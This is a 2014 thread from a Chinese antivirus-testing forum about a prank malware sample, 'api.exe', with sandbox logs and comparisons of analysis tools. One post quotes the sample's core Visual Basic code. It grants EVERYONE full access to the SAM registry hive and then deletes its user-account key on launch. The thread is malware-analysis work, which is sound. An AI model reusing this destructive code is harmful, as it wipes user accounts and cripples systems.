坑爹恶作剧满满都是API

显示全部楼层 · 发表于 2014-6-14 23:24:56

bav 星星miss ,在沙盘里运行了一下

显示全部楼层 · 发表于 2014-6-14 23:26:02

依班娜发表于 2014-6-14 23:19
他那是EQ
话说还是VB？
不放出源码？

VB
核心：
lVal = RegOpenKeyEx(lKey, sKeyName, 0, KEY_ALL_ACCESS, hKey)
lVal = SHDeleteKey(lKey, sKeyName)
RegCloseKey (hKey)
BuildExplicitAccessWithName(ea, "EVERYONE", KEY_ALL_ACCESS, SET_ACCESS, SUB_CONTAINERS_AND_OBJECTS_INHERIT)
result = SetEntriesInAcl(1, ea, pOldDACL, pNewDACL)
result = SetNamedSecurityInfo("MACHINE\SAM\SAM", 4&, 4&, 0&, 0&, pNewDACL, 0&)

form_load
DelKey HKEY_LOCAL_MACHINE, "SAM\SAM\Domains\Account\Users"

显示全部楼层 · 发表于 2014-6-14 23:29:01

本帖最后由瓜g 于 2014-6-14 23:34 编辑

时间	事件	结果	附加信息
2014/6/14 23:25	系统内核加固	阻止	规则ID：131268623 防护类型：系统关机（应该也包括重启）进程：目标进程：
2014/6/14 23:25	木马防御	自动处理api.exe	规则ID：33557248 进程：C:\USERS\123\DESKTOP\API.EXE 相关文件：
2014/6/14 23:25	木马防御	自动处理api.exe	规则ID：33557248 进程：C:\USERS\123\DESKTOP\API.EXE 相关文件：

显示全部楼层 · 发表于 2014-6-14 23:35:37

深山红叶__ 发表于 2014-6-14 23:15
为什么会有哈勃这种东西...看来我与社会脱节了？

腾讯新出的

显示全部楼层 · 发表于 2014-6-14 23:35:58

To Avira [#1687493]

显示全部楼层 · 发表于 2014-6-14 23:37:08

瓜g 发表于 2014-6-14 23:35
腾讯新出的

完全不明真相，名字听起来挺厉害的

显示全部楼层 · 发表于 2014-6-14 23:39:20

深山红叶__ 发表于 2014-6-14 23:37
完全不明真相，名字听起来挺厉害的

目前和火眼有一定差距，有些动作无法识别出来。。。

显示全部楼层 · 发表于 2014-6-14 23:40:39

瓜g 发表于 2014-6-14 23:39
目前和火眼有一定差距，有些动作无法识别出来。。。

新出的都会坑一些，目测会搞好，不过tx...

显示全部楼层 · 发表于 2014-6-14 23:43:45

本帖最后由依班娜于 2014-6-14 23:48 编辑

深山红叶__ 发表于 2014-6-14 23:26
VB
核心：
lVal = RegOpenKeyEx(lKey, sKeyName, 0, KEY_ALL_ACCESS, hKey)

用记事本看了一下，然后百度了一下

显示全部楼层 · 发表于 2014-6-15 09:10:06

微点表示不用实验了

[病毒样本] 坑爹恶作剧满满都是API

本帖子中包含更多资源

本帖子中包含更多资源

[病毒样本] 坑爹恶作剧 满满都是API

本帖子中包含更多资源

本帖子中包含更多资源

[病毒样本] 坑爹恶作剧满满都是API